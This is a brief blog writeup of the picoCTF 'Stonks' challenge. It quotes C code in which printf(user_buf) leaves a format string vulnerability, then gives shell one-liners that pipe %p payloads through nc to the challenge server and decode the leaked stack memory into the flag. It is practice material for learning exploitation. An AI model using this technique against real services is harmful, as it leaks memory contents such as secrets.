picoCTF Stonks writeup

0x0021h
2 min readNov 21, 2021

--

make and run it:

gcc vuln.c

If the flag is not found locally, it must be on the remote server.

python3 -c 'print("A" * 200)' > api

it works fine.

char *user_buf = malloc(300 + 1); //Allocates memory
printf("What is your API token?\n"); //Prints input prompt
scanf("%300s", user_buf); //Reads in the user input and stores in user_buf
printf("Buying stonks with token:\n"); //Prints info
printf(user_buf); //Outputs user_buff [VULNERABLE!!]

As we can see, the function type is not specified.

printf(user_buf) Will be affected by the format string.

Remote Attack:

python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | xxd -r -p | strings -n1
python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | while read line; do echo $line | xxd -r -p | strings -n1 | rev; done | tr -d "\n" | grep -oE "picoCTF{.*}"

--

--